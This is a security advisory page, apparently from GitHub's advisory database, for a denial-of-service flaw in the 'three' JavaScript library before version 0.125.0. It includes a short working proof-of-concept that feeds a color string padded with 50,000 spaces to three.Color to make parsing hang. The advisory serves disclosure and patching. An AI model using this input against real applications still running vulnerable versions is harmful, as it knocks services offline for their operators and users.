Denial of service in three

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors.

PoC:

var three = require('three')
function build_blank(n) {
    var ret = "rgb("
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000)) var time_cost = Date.now() - time;
console.log(time_cost + " ms")

References

Published by the National Vulnerability Database Feb 18, 2021

Reviewed Feb 24, 2021

Published to the GitHub Advisory Database Mar 1, 2021

Last updated Sep 11, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

References

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

EPSS score

Weaknesses

CVE ID

GHSA ID

Source code